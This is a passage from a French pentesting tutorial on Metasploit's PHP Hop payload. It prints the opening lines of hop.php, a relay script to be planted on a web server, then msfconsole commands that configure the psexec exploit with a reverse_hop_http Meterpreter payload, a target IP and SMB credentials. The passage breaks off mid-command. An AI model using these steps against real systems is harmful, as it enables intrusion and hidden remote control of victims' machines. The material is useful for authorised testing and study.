Sommaire

PHP Hop

PHP Hop est un payload permettant de faire transiter l’ensemble des communications à travers une connexion HTTP ou HTTPS (un hop point).

Afin d’exécuter cela, il est nécessaire de déposer le code PHP permettant de réaliser le tunneling au sein d’un serveur web accessible et autorisant l’exécution du PHP. Le code PHP se trouve au sein du framework Metasploit dans le fichier /usr/share/metasploit-framework/data/php/hop.php :

root@kali:~# head /usr/share/metasploit-framework/data/php/hop.php  
<?php  
$magic = ’TzGq’;  
$tempdir = sys_get_temp_dir() . "/hop" . $magic;  
if(!is_dir($tempdir)){  
   mkdir($tempdir); //make sure it’s there  
}  
 
//get url  
$url = $_SERVER["QUERY_STRING"];  
//like /path/hop.php?/uRIcksm_lOnGidENTifIEr

Une fois le code PHP mis en place, certains modules permettent l’utilisation de payloads de type reverse_hop_http tel que psexec par exemple :

msf5 > use exploit/windows/smb/psexec  
 
msf5 exploit(windows/smb/psexec) > set PAYLOAD  
windows/meterpreter/reverse_hop_http  
PAYLOAD => windows/meterpreter/reverse_hop_http 
 
msf5 exploit(windows/smb/psexec) > set RHOSTS XX.XX.45.235  
RHOSTS => XX.XX.45.235 
 
msf5 exploit(windows/smb/psexec) > set SMBPass Password  
SMBPass => Password 
 
msf5 exploit(windows/smb/psexec) > set SMBUser Admin  
SMBUser => ...